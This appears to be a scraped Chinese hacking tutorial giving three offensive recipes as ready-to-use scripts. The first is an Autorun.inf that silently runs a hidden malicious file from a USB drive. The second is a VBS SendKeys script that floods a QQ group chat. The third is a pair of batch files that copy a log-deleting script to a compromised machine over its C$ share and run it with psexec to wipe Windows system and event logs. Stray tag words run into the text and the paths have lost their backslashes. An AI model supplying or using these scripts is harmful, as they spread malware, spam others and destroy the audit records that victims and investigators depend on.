一、將可執行惡意文件放入U盤。並設置隱藏。
shell
二、建立文件 Autorun.infide
三、寫入內容:
測試
[AutoRun] OPEN=惡意文件全名 shellexecute=惡意文件全名 shell\Atuo\command=惡意文件全名
隱藏本文件。spa
四、當U盤插入新的設備,操做人員雙擊U盤圖標查看U盤時,會自動運行惡意文件。日誌
VBS腳本,QQ羣聊刷屏:ip
新建vbs後綴文件。內容以下:it
Set WshShell= WScript.CreateObject("WScript.Shell") WshShell.AppActivate "羣聊刷屏測試" for i=1 to 10 WScript.Sleep 500 WshShell.SendKeys "^v" WshShell.SendKeys i WshShell.SendKeys "%s" Next
#for i=1to 10」語句用來控制發送次數,表示發送10次class
打開一個羣聊天窗口並複製要發送的內容到剪貼板上,雙擊剛纔生成的「qq.vbs」切換到羣聊天窗口中,在其中可看到已自動刷屏了。file
日誌清除:command
新建del.bat腳本
@del c:winntsystem32logfiles*.* @del c:winntsystem32config*.evt @del c:winntsystem32dtclog*.* @del c:winntsystem32*.log @del c:winntsystem32*.txt @del c:winnt*.txt @del c:winnt*.log @del c:del.bat
新建clean.bat
@copy del.bat \%1c$ @echo 向肉雞複製本機的del.bat ……OK @psexec \%1 c:del.bat @echo 在肉雞上運行del.bat ,清除日誌文件……OK